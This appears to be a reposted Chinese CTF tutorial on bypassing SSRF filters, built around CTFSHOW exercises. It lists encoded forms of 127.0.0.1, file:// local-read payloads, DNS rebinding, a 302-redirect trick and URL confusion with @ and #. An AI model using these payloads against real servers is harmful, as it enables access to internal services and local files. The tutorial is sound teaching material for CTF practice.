CTF之SSRF常见绕过

这篇具有很好参考价值的文章主要介绍了CTF之SSRF常见绕过。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.绕过localhost和127.0.0.1

当程序中限制了我们使用localhost和127.0.0.1时,便可以利用进制转换来绕过

http://0x7F.0.0.1	//16进制
http://0177.0.0.1	//8进制
http://2130706433	//10进制整数格式
http://0x7F000001	16进制整数格式
http://127.1	//省略模式
http://127.127.127.127	//用CIDR绕过localhost
http://0	//特殊地址0
http://0.0.0.0
http://[::1]	//ipv6回环地址

ip进制转换:https://tool.520101.com/wangluo/jinzhizhuanhuan
进制转换:https://www.sojson.com/hexconvert.html

2.CTFSHOW例题:

2.1 直接利用SSRF漏洞进行本地读取flag:

Payload:url=http://127.0.0.1/ctf/ssrf/flag.php
Payload:url=file:///C:/phpstudy/phptutorial/www/ctf/ssrf/1.txt

CTF之SSRF常见绕过
2.2 绕过localhost和127.0.0.1

Payload:url=http://127.127.127.127/ctf/ssrf/flag.php

CTF之SSRF常见绕过
2.3 绕过localhost和0和1
(1)DNS重绑定:

http://test.com ——> 127.0.0.1

公共域名解析到127.0.0.1:

https://blog.csdn.net/lovelyelfpop/article/details/107306577

(2)302跳转:

header("Location:http://127.0.0.1/flag.php");
Payload:url=http://safe.taobao.com/ctf/ssrf/flag.php

CTF之SSRF常见绕过
2.4 绕过限定的URL
URL中#、@的妙用:

例:https://www.baidu.com#www.qq.com
https://www.baidu.com@www.qq.com
http://www.baidu.com@www.qq.com  //实则访问www.qq.com
http://www.baidu.com#www.qq.com  //实则访问www.baidu.com
Payload:url=http://ctf.@127.0.0.1/ctf/ssrf/flag.php#show

CTF之SSRF常见绕过文章来源地址https://www.toymoban.com/news/detail-424414.html

到了这里,关于CTF之SSRF常见绕过的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 解决Mac无法访问localhost和127.0.0.1

    效果如下: localhost 127.0.0.1    

    2024年02月11日
    浏览(60)
  • 127.0.0.1 / localhost / 0.0.0.0 这几个IP的区别

    127.0.0.1是一个 IPV4 地址。 IPV4 地址有 32 位,一个字节有 8 位,共 4 个字节。 其中, 127 开头的都属于回环地址 ,也是 IPV4 的特殊地址, 127.0.0.1 是众多回环地址中的一个。 IPv4 的地址是 32 位的,2的32次⽅,⼤概是 40+亿 。地球光⼈⼝就76亿了,40亿IP这点ᰁ,塞⽛缝 都不够,

    2024年02月20日
    浏览(72)
  • 【计算机网络】127.0.0.1、0.0.0.0、localhost地址是什么?

    IPV4中 ,0.0.0.0地址被用于表示一个 无效的,未知的或者不可用的目标 。 在服务器中 ,0.0.0.0指的是 本机上的所有IPV4地址 ,如果一个主机有两个IP地址,192.168.1.1 和 10.1.2.1,并且该主机上的一个服务监听的地址是0.0.0.0,那么通过两个ip地址都能够访问该服务。 在路由中 ,0.

    2023年04月12日
    浏览(41)
  • 浅谈CTF中各种花式绕过的小trick

    前言 在代码审计的时候,我们不难发现很多很多的函数需要我们bypass,这些知识点很多又很小,基本上是一眼就明白,但是下一次遇见又不太清晰,需要反反复复查找,这篇文章浅浅做个汇总,如有不足,欢迎补充。 md5加密bypass 弱比较绕过 方法一:0e绕过 绕过原理 :PHP在

    2024年02月11日
    浏览(37)
  • iis网站localhost(127.0.0.1)可以访问,使用本机局域网IP(192.168.4.*)不能访问

    在项目服务器上,用IIS发布网站之后,使用地址 http://localhost:10022/可以正常访问,换成http://127.0.0.1:10022/也可以正常访问,但把localhost改成服务器IP地址 http://192.168.4.64:10022/,却显示无法打开此地址 检查防火墙状态,如果防火墙处于开启状态,需要将网站对应端口进行入栈,

    2024年02月02日
    浏览(59)
  • Flink: Could not connect to BlobServer at address localhost/127.0.0.1:34036

    提交flink的作业时,报如下错误: 修改jobmanager的配置文件,flink-conf.yaml,:

    2024年02月07日
    浏览(62)
  • 报错:Connection to node -1 (localhost/127.0.0.1:9092) could not be established.

    在使用java客户端连接kafka时,怎么都连接不上,防火墙端口也开放了,后面查资料得知需要将修改kafka安装目录下的config/server.properties文件: 但是这样在执行kafka生产者命令时又出现问题:Connection to node -1 (localhost/127.0.0.1:9092) could not be established. Broker may not be available. kafka启动

    2024年02月11日
    浏览(113)
  • Flink报错:Could not connect to BlobServer at address localhost/127.0.0.1:39203

    Flink报错:Could not connect to BlobServer at address localhost/127.0.0.1:39203 个人使用1.15.3的单节点测试发现是jobmanager-bind-host的参数问题 对flink-conf.yaml的jobmanager-bind-host 进行修改 standlone模式注释掉,或者设置0.0.0.0 YARN上,如果设置为 localhost ,这个设置将被忽略,默认为0.0.0.0。 Kubernet

    2024年02月16日
    浏览(44)
  • CTF笔记:PHP函数is_numeric()绕过

    在做CTF过程中遇到的is_numeric()函数,作用是判断输入是不是数字或数字字符串。 思路1:数值-非数值 原题是[极客大挑战 2019]BuyFlag,判断代码如下: 密码是404,但是不能输入数字,所以要考虑绕过的问题,这里记录解题思路。 上网搜了一下,可以借助url编码中的空字符,例

    2024年02月08日
    浏览(40)
  • 【CTF-web】备份是个好习惯(查找备份文件、双写绕过、md5加密绕过)

    题目链接:https://ctf.bugku.com/challenges/detail/id/83.html 经过扫描可以找到index.php.bak备份文件,下载下来后打开发现是index.php的原代码,如下图所示。 由代码可知我们要绕过md5加密,两数如果满足科学计数法的形式的话,php会将其当作科学计数法所得的数字来进行比较,根据该原

    2024年02月12日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包